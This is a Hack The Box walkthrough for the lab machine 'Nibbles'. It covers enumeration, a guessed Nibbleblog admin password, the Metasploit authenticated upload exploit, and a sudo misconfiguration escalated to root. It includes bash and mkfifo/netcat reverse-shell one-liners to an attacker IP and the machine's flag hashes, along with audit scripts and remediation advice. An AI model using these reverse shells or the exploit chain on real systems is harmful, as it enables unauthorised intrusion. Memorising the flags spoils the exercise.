
Nibbles - Hack The Box Walkthrough

Overview

Nibbles is an easy-rated Linux machine from Hack The Box that involves web application enumeration, an authenticated file-upload vulnerability in Nibbleblog CMS (reached with a guessed admin password), and privilege escalation through a sudo rule that runs a script from the user's own home directory as root without a password.

Target IP: 10.129.13.133

Reconnaissance

Initial Port Scan

Started with a full TCP sweep (all 65535 ports, connect scan, so root is not strictly required) to identify open ports:

export target=10.129.13.133
sudo nmap -p- --min-rate 5000 -sT -vvv $target

Results: two open TCP ports, 22 and 80.

Service Version Detection

Performed detailed service enumeration on discovered ports:

sudo nmap -sC -sV -p 22,80 -T4 $target

Findings: SSH (OpenSSH) on 22/tcp and an Apache HTTP server on 80/tcp, on an Ubuntu host.
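The two-stage scan above (full-range sweep first, then scripts and version detection only on what was open) as one script. This is an added example, not code from the original walkthrough; it assumes nmap is on PATH and that scanning the target is authorised. The parsing function reads nmap's grepable output (-oG), so the second scan is driven by the first rather than by retyping the port list:

```shell
#!/usr/bin/env bash
# Two-stage nmap: fast full-range TCP sweep, then -sC -sV on open ports only.
# Added example (not from the original walkthrough). Assumes nmap on PATH.
set -eu

# Parse nmap grepable output (-oG) and print the open TCP ports as a
# comma-separated list suitable for `nmap -p`, e.g. "22,80".
# Closed and filtered ports are ignored.
open_ports_from_grepable() {
  grep -o '[0-9]\{1,5\}/open/tcp' "$1" | cut -d/ -f1 | sort -n | uniq | paste -s -d, -
}

# Run the sweep, then the scripted/version scan on whatever came back open.
# $1 = target, $2 = output prefix (default: nmap_<target>).
staged_scan() {
  target="$1"
  prefix="${2:-nmap_$1}"
  # -sT (connect scan) needs no root; -p- covers all 65535 TCP ports.
  nmap -p- --min-rate 5000 -sT -oG "${prefix}_full.gnmap" "$target" >/dev/null
  ports="$(open_ports_from_grepable "${prefix}_full.gnmap")"
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $target" >&2
    return 1
  fi
  nmap -sC -sV -p "$ports" -oN "${prefix}_services.nmap" "$target"
}

# Usage: ./staged_scan.sh 10.129.13.133
if [ $# -gt 0 ]; then
  staged_scan "$@"
fi
```

The sweep's grepable file is kept on disk so the port list can be re-derived later; the service scan is saved in normal output (-oN) for the report.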

Enumeration

Web Application Discovery

Visiting http://10.129.13.133 revealed a basic webpage. Conducted directory brute-forcing:


gobuster dir -u http://$target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 50 2>/dev/null

Discovered: the /nibbleblog/ directory, a Nibbleblog CMS installation.

Nibbleblog Enumeration

Further enumeration of the Nibbleblog directory:

gobuster dir -u http://$target/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 50 2>/dev/null

Key Findings: admin.php (the administrative login) and the content/ tree, where Nibbleblog stores plugin data and uploads (for example content/private/plugins/my_image/).

Admin Panel Access

  1. Admin Portal Discovery: Accessed http://10.129.13.133/nibbleblog/admin.php
  2. Credential Guessing: Nibbleblog ships no default password (the installer sets one), but the weak pair admin:nibbles (the machine name) was accepted. Nibbleblog blacklists a source IP after a handful of failed logins, so try a few likely candidates by hand rather than brute-forcing
  3. Successful Login: Gained access to the Nibbleblog admin panel
  4. Version Identification: Navigated to http://10.129.13.133/nibbleblog/admin.php?controller=settings&action=general, which revealed Nibbleblog version 4.0.3


Vulnerability Research

searchsploit nibbleblog

Exploits Found: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit), the My Image plugin upload tracked as CVE-2015-6967. It requires a valid admin login, so the guessed credentials are what make it usable.

Initial Access

Metasploit Exploitation

The module logs in with the admin credentials and uploads a PHP payload through the My Image plugin, so this is an authenticated exploit; without USERNAME and PASSWORD it does nothing.

sudo msfconsole
msf6 > use exploit/multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.129.13.133
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST tun0
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit


Establishing Reverse Shell

The module returns a PHP Meterpreter session running as the web server user, nibbler. Dropping to a system shell and spawning a bash reverse shell to a plain netcat listener gives a more robust channel that does not depend on the Metasploit session. Start the listener on the attacking host first:

nc -nlvp 9005

Then, from the Meterpreter session (the /dev/tcp redirection is a bash feature, hence the check for bash):

meterpreter > shell
which bash
/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.106/9005 0>&1"

User Flag

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
efbe7c0779cc99bbecb4cf4d9b5ecc5a

Privilege Escalation

Sudo Privilege Analysis

nibbler@Nibbles:~$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh


Exploiting Sudo Misconfiguration

The whitelisted path sits under /home/nibbler, so nibbler owns every directory above it and can create or replace the script with arbitrary content; sudo then runs whatever is there as root. sudo reports "command not found" for a target that lacks the execute bit, so the file must be made executable.

  1. Create Directory Structure:
    mkdir -p /home/nibbler/personal/stuff
    
  2. Create Malicious Script (a mkfifo-based reverse shell to the attacking host):
    echo '#!/bin/bash' > /home/nibbler/personal/stuff/monitor.sh
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.106 9006 >/tmp/f" >> /home/nibbler/personal/stuff/monitor.sh
    
  3. Make It Executable:
    chmod +x /home/nibbler/personal/stuff/monitor.sh
    
  4. Execute with Sudo Privileges (with the listener below already running):
    sudo /home/nibbler/personal/stuff/monitor.sh
    

Root Shell Listener (started on the attacking host before step 4):

nc -nlvp 9006
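The check a practitioner wants after `sudo -l`: which NOPASSWD targets could the current user replace? The script below, an added example that is not from the original walkthrough, parses a saved `sudo -l` listing and flags every absolute-path target whose file, or any directory above it, is writable by the user running the audit (a missing file under a writable directory counts too, since it can simply be created). It assumes the listing was saved with `sudo -l > sudo.txt` and that the audit runs as the same unprivileged user, since the writability tests are evaluated for whoever runs it:

```shell
#!/usr/bin/env bash
# Audit a saved `sudo -l` listing for NOPASSWD targets the current user could
# replace. Added example (not from the original walkthrough). Assumes the
# listing was produced by `sudo -l` and is audited as the same unprivileged user.
set -eu

# Print every NOPASSWD command from the listing, one per line, arguments dropped.
# Only absolute paths are emitted; the ALL keyword and bare names are skipped.
nopasswd_targets() {
  grep 'NOPASSWD:' "$1" | sed 's/.*NOPASSWD:[[:space:]]*//' | tr ',' '\n' |
  while read -r cmd; do
    exe="${cmd%% *}"
    case "$exe" in
      /*) printf '%s\n' "$exe" ;;
    esac
  done
}

# Walk from $1 up to / and return 0 if any existing component is writable by us.
# A target that does not exist yet under a writable directory is still hijackable.
path_hijackable() {
  p="$1"
  while :; do
    if [ -w "$p" ]; then
      return 0
    fi
    [ "$p" = "/" ] && return 1
    p="$(dirname "$p")"
  done
}

# Print "HIJACKABLE <path>" for each NOPASSWD target the user could replace.
audit_sudo_listing() {
  nopasswd_targets "$1" | while read -r exe; do
    if path_hijackable "$exe"; then
      printf 'HIJACKABLE %s\n' "$exe"
    fi
  done
}

# Usage: sudo -l > sudo.txt && ./sudo_audit.sh sudo.txt
if [ $# -gt 0 ]; then
  audit_sudo_listing "$1"
fi
```

Run against the listing above it flags /home/nibbler/personal/stuff/monitor.sh, because /home/nibbler is nibbler's own directory. The fix on the defending side is to make the target immutable from the user's point of view: install the script root-owned with mode 0755 in a root-owned directory (for example /usr/local/sbin) and point the sudoers entry there. A NOPASSWD rule on a user-writable script is equivalent to NOPASSWD: ALL.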


Root Flag

# cat /root/root.txt
2e8261585eea5626b6ca3c9668f95fc9

Lessons Learned

Security Misconfigurations

  1. Weak Credentials: the Nibbleblog admin account used a guessable password (the machine name); Nibbleblog ships no default password, so this was chosen at install time
  2. Outdated Software: Nibbleblog 4.0.3 is affected by CVE-2015-6967, an authenticated arbitrary file upload in the My Image plugin, fixed in 4.0.5
  3. Sudo Misconfiguration: nibbler may run a script as root without a password, and the script lives under nibbler's own home directory, so nibbler controls what runs as root

Attack Vectors

  1. Arbitrary File Upload: admin credentials plus the My Image plugin upload gave code execution as the web server user (Metasploit module exploit/multi/http/nibbleblog_file_upload)
  2. Privilege Escalation: replacing the sudo-whitelisted script with a reverse shell gave root

Defense Recommendations

  1. Use strong, unique credentials for administrative accounts, and do not expose admin panels more widely than necessary
  2. Keep software updated with the latest security patches (here, Nibbleblog 4.0.5 or later)
  3. Apply least privilege to sudo: never whitelist a command under a user-writable path; keep sudo targets root-owned in a root-owned directory
  4. Regular security audits and penetration testing

This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting security testing.